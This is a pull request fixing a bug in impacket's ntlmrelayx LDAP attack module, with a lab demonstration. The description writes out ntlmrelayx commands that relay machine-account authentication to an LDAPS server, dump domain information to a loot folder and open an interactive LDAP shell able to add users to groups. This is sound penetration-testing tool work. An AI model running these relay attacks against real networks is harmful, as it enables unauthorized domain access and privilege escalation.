### PR TITLE
fix non-interactive LDAP

### DIFF
--- a/impacket/examples/ntlmrelayx/attacks/ldapattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/ldapattack.py
@@ -507,13 +507,14 @@ class LDAPAttack(ProtocolAttack):
         # Create new dumper object
         domainDumper = ldapdomaindump.domainDumper(self.client.server, self.client, domainDumpConfig)
 
-        if self.tcp_shell is not None:
-            LOG.info('Started interactive Ldap shell via TCP on 127.0.0.1:%d' % self.tcp_shell.port)
-            # Start listening and launch interactive shell.
-            self.tcp_shell.listen()
-            ldap_shell = LdapShell(self.tcp_shell, domainDumper, self.client)
-            ldap_shell.cmdloop()
-            return
+        if self.config.interactive:
+            if self.tcp_shell is not None:
+                LOG.info('Started interactive Ldap shell via TCP on 127.0.0.1:%d' % self.tcp_shell.port)
+                # Start listening and launch interactive shell.
+                self.tcp_shell.listen()
+                ldap_shell = LdapShell(self.tcp_shell, domainDumper, self.client)
+                ldap_shell.cmdloop()
+                return
 
         # If specified validate the user's privileges. This might take a while on large domains but will
         # identify the proper containers for escalating via the different techniques.


### PR DESCRIPTION
[PR 747](https://github.com/SecureAuthCorp/impacket/pull/747) seems to have broken non-interactive LDAP. This happens due the check on [line 510](https://github.com/SecureAuthCorp/impacket/blob/8d4c91481b01dae9f62804893fcc74a40ffc7c45/impacket/examples/ntlmrelayx/attacks/ldapattack.py#L510)

```python
if self.tcp_shell is not None:	
	LOG.info('Started interactive Ldap shell via TCP on 127.0.0.1:%d' % self.tcp_shell.port)	
	# Start listening and launch interactive shell.
    self.tcp_shell.listen()	
	ldap_shell = LdapShell(self.tcp_shell, domainDumper, self.client)
    ldap_shell.cmdloop()
    return
```

```bash
justin-p@ctf-machine:~$ ntlmrelayx.py -6 -t ldaps://10.11.12.1 -wh wdap.lab.justin-p.me -l /home/justin-p/lootme

...

[*] Authenticating against ldaps://10.11.12.1 as LAB\LAB-PC02$ SUCCEED
Exception in thread Thread-38:
Traceback (most recent call last):
  File "/usr/lib/python3.7/threading.py", line 926, in _bootstrap_inner
    self.run()
  File "/usr/local/lib/python3.7/dist-packages/impacket-0.9.21.dev1+20200205.195239.8d4c9148-py3.7.egg/impacket/examples/ntlmrelayx/attacks/ldapattack.py", line 510, in run
    if self.tcp_shell is not None:
AttributeError: 'LDAPAttack' object has no attribute 'tcp_shell'
```

Commenting out lines 510 to 516 -> works

```bash
justin-p@ctf-machine:~$ ntlmrelayx.py -6 -t ldaps://10.11.12.1 -wh wdap.lab.justin-p.me -l /home/justin-p/lootme

...

[*] Authenticating against ldaps://10.11.12.1 as LAB\LAB-PC02$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] Authenticating against ldaps://10.11.12.1 as LAB\LAB-PC02$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] Dumping domain info for first time
[*] Domain info dumped into lootdir!
```

To fix this I added `if self.config.interactive:` before line 510

```python
if self.config.interactive:
    if self.tcp_shell is not None:
        LOG.info('Started interactive Ldap shell via TCP on 127.0.0.1:%d' % self.tcp_shell.port)
        # Start listening and launch interactive shell.
        self.tcp_shell.listen()
        ldap_shell = LdapShell(self.tcp_shell, domainDumper, self.client)
        ldap_shell.cmdloop()
        return
```

```bash
justin-p@ctf-machine:~$ ntlmrelayx.py -6 -t ldaps://10.11.12.1 -wh wdap.lab.justin-p.me -l /home/justin-p/lootme

...

[*] Authenticating against ldaps://10.11.12.1 as LAB\LAB-PC01$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] Authenticating against ldaps://10.11.12.1 as LAB\LAB-PC01$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] Dumping domain info for first time
[*] Domain info dumped into lootdir!


justin-p@ctf-machine:~$ntlmrelayx.py -6 -t ldaps://10.11.12.1 -wh wdap.lab.justin-p.me -l /home/justin-p/lootme -i

...

[*] HTTPD: Received connection from ::ffff:192.168.136.136, attacking target ldaps://10.11.12.1
[*] HTTPD: Client requested path: login.live.com:443
[*] HTTPD: Received connection from ::ffff:192.168.136.136, attacking target ldaps://10.11.12.1
[*] HTTPD: Client requested path: login.live.com:443
[*] HTTPD: Client requested path: login.live.com:443
[*] Authenticating against ldaps://10.11.12.1 as LAB\LAB-PC02$ SUCCEED
[*] Started interactive Ldap shell via TCP on 127.0.0.1:11006

justin-p@ctf-machine:~$ nc 127.0.0.1 11006
Type help for list of commands

# help

 add_user new_user [parent] - Creates a new user.
 add_user_to_group user group - Adds a user to a group.
 dump - Dumps the domain.
 search query [attributes,] - Search users and groups by name, distinguishedName and sAMAccountName.
 get_user_groups user - Retrieves all groups this user is a member of.
 get_group_users group - Retrieves all members of a group.
 exit - Terminates this session.

# 
```
